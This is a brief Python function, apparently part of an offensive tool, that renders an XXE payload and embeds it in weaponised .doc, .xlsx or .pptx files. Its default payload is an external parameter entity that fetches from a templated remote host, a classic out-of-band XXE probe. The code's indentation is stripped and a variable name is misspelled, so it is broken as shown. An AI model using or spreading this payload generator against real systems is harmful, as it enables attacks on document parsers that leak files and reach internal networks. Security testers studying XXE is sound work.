def make_file(filetype, payload):
defualt_payload = '''<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://{{host}}/">
%remote;
]>'''
xxe_payload = payload or defualt_payload
if filetype and xxe_payload:
xxe_payload = render(xxe_payload)
if xxe_payload:
gen = PayloadGen(xxe_payload, dirname=tempfile.tempdir)
if filetype == "doc":
return gen.doc_poc()
elif filetype == "xlsx":
return gen.xlsx_poc()
elif filetype == "pptx":
return gen.pptx_poc()
return ""
